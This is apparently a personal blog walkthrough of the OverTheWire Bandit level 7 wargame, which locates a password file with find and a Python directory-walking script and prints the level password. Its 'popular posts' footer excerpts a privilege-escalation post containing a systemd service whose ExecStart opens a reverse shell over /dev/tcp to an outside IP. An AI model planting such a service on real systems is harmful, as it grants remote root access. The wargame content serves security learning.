Skip to main content

Over the Wire - Bandit 7

Bandit 7
Objectives
Level GoalThe password for the next level is stored somewhere on the server and has all of the following properties:
  • owned by user bandit7
  • owned by group bandit6
  • 33 bytes in size

 Solution

 so we are looking for a file owned by user bandit7 and group bandit 6 somwhere on the server......

I started by cd .. all the way up to root
with the comman find * -user bandit7 -group bandit6


bandit6@bandit:/$ find * -user bandit7 -group bandit6find: ‘boot/lost+found’: Permission deniedfind: ‘cgroup2/csessions’: Permission deniedfind: ‘etc/ssl/private’: Permission deniedfind: ‘etc/lvm/backup’: Permission deniedfind: ‘etc/lvm/archive’: Permission deniedfind: ‘etc/polkit-1/localauthority’: Permission deniedfind: ‘home/bandit28-git’: Permission deniedfind: ‘home/bandit30-git’: Permission deniedfind: ‘home/bandit31-git’: Permission deniedfind: ‘home/bandit5/inhere’: Permission deniedfind: ‘home/bandit27-git’: Permission deniedfind: ‘home/bandit29-git’: Permission deniedfind: ‘lost+found’: Permission deniedfind: ‘proc/tty/driver’: Permission deniedfind: ‘proc/30734/task/30734/fd/6’: No such file or directoryfind: ‘proc/30734/task/30734/fdinfo/6’: No such file or directoryfind: ‘proc/30734/fd/5’: No such file or directoryfind: ‘proc/30734/fdinfo/5’: No such file or directoryfind: ‘root’: Permission deniedfind: ‘run/lvm’: Permission deniedfind: ‘run/screen/S-bandit0’: Permission deniedfind: ‘run/screen/S-bandit13’: Permission deniedfind: ‘run/screen/S-bandit1’: Permission deniedfind: ‘run/screen/S-bandit10’: Permission deniedfind: ‘run/screen/S-bandit4’: Permission deniedfind: ‘run/screen/S-bandit3’: Permission deniedfind: ‘run/screen/S-bandit22’: Permission deniedfind: ‘run/screen/S-bandit18’: Permission deniedfind: ‘run/screen/S-bandit17’: Permission deniedfind: ‘run/screen/S-bandit25’: Permission deniedfind: ‘run/screen/S-bandit9’: Permission deniedfind: ‘run/screen/S-bandit16’: Permission deniedfind: ‘run/screen/S-bandit5’: Permission deniedfind: ‘run/screen/S-bandit19’: Permission deniedfind: ‘run/screen/S-bandit7’: Permission deniedfind: ‘run/screen/S-bandit33’: Permission deniedfind: ‘run/screen/S-bandit29’: Permission deniedfind: ‘run/screen/S-bandit28’: Permission deniedfind: ‘run/screen/S-bandit27’: Permission deniedfind: ‘run/screen/S-bandit21’: Permission deniedfind: ‘run/screen/S-bandit15’: Permission deniedfind: ‘run/screen/S-bandit31’: Permission deniedfind: ‘run/screen/S-bandit30’: Permission deniedfind: ‘run/screen/S-bandit14’: Permission deniedfind: ‘run/screen/S-bandit2’: Permission deniedfind: ‘run/screen/S-bandit24’: Permission deniedfind: ‘run/screen/S-bandit23’: Permission deniedfind: ‘run/screen/S-bandit20’: Permission deniedfind: ‘run/shm’: Permission deniedfind: ‘run/lock/lvm’: Permission deniedfind: ‘sys/fs/pstore’: Permission deniedfind: ‘tmp’: Permission deniedfind: ‘var/spool/bandit24’: Permission deniedfind: ‘var/spool/rsyslog’: Permission deniedfind: ‘var/spool/cron/crontabs’: Permission deniedfind: ‘var/log’: Permission deniedfind: ‘var/tmp’: Permission deniedfind: ‘var/cache/ldconfig’: Permission deniedfind: ‘var/cache/apt/archives/partial’: Permission deniedvar/lib/dpkg/info/bandit7.passwordfind: ‘var/lib/apt/lists/partial’: Permission deniedfind: ‘var/lib/polkit-1’: Permission denied


I see something towards the end that is probably what we are looking for but lets get rid of all those permission denied entrys

bandit6@bandit:/$ find * -user bandit7 -group bandit6 2>/dev/nullvar/lib/dpkg/info/bandit7.password

Much better  there is a file in /var/lib/dpkg/info called bandit7password  I'm pretty sure that the file we are looking for but lets take a look at the size just to be sure

bandit6@bandit:/$ ls /var/lib/dpkg/info/ -ls | grep 'bandit7.password'   4 -rw-r----- 1 bandit7 bandit6      33 Oct 16  2018 bandit7.password

Yup 33k

lets see what's in there

bandit6@bandit:/$ cat /var/lib/dpkg/info/bandit7.passwordHKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs


Cool found this one using bash..... now i'll spend some time torturing my self to figure out how to do it in python :)

so here is what I pieced together in python

I re-used a lot of the code from the last bandit

Added os.stat(filevar).st_uid to get the user #
Added os.stat(filevar).st_gid to get the group #

converted those to names using 
pwd.getpwuid(varfileonwer)[0]
grp.getgrid(varfilegroup)[0]

then added a couple of and to my If statement to check if the owner and group names matched those in the instruction

since we are walking whole directory structure of /   I found a little snippet on the interwebs to redirect error messsages to DevNull to keep them from printing on the screen






#Import os moduleimport os#Import math and time moduleimport math,time,grp,pwd,sys

class DevNull:    def write(self, msg):        pass

#Set listing start location
dir_count = 0file_count = 0
#Traverse directory treefor (path,dirs,files) in os.walk(os.curdir):        dir_count += 1    #Repeat for each file in directory    for file in files:     try :      filevar = os.path.join(path,file)      #print('filevar is',filevar)      varfilesize =  os.path.getsize(filevar)      varfileowner = os.stat(filevar).st_uid      varfilegroup = os.stat(filevar).st_gid      varfileownername = pwd.getpwuid(varfileowner)[0]      varfilegroupname = grp.getgrgid(varfilegroup)[0]      if varfilesize == 33 and varfileownername == 'bandit7' and varfilegroupname == 'bandit6':       print('Bingo file found*****************************')       print(filevar,varfilesize)       print('onwer is ',varfileownername)       print('group is ',varfilegroupname)       filetmp = open(filevar)       filetmp.read()     except Exception as err:       sys.stderr = DevNull()     file_count += 1



Here is the output of the python script

Bingo file found*****************************('./var/lib/dpkg/info/bandit7.password', 33)('onwer is ', 'bandit7')('group is ', 'bandit6')'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'Bingo file found*****************************('./proc/1521/task/1521/fd/4', 33)('onwer is ', 'bandit7')('group is ', 'bandit6')'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'Bingo file found*****************************('./proc/1521/fd/3', 33)('onwer is ', 'bandit7')('group is ', 'bandit6')'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'Bingo file found*****************************('./proc/1521/fd/4', 33)('onwer is ', 'bandit7')('group is ', 'bandit6')'HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs\n'






Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more